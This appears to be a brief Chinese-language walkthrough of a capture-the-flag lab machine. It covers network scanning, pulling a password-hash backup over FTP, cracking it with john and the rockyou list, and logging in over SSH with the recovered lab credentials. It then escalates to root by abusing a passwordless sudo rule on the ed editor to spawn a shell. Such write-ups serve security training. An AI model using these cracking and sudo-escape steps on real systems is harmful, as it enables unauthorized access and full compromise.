信息收集
arp-scan -l
发现靶机 192.168.119.158
nmap -A -p1-65535 192.168.119.158
登录ftp
打开 是一个密文
解压字典
gunzip /usr/share/wordlists/rockyou.txt.gz
识别加密类型
john backup –wordlist=/usr/share/wordlists/rockyou.txt
发现是sha512
解密
john –format=sha512crypt backup –wordlist=/usr/share/wordlists/rockyou.txt
解密得到账号密码
cheer14 (sunset)
尝试登录ssh
连接ssh
ssh sunset@192.168.119.158
查看使用过那些操作
history
什么也没有
提权
查看可以使用管理员打开的文件
sudo -l
发现 一个
(root) NOPASSWD: /usr/bin/ed 不需要密码也可以执行
ls 发现一个user.txt文件
一串十六进制
5b5b8e9b01ef27a1cc0a2d5fa87d7190
解密
也是不需要密码可执行
那就执行
sudo /usr/bin/ed
输入!/bin/sh,进入root权限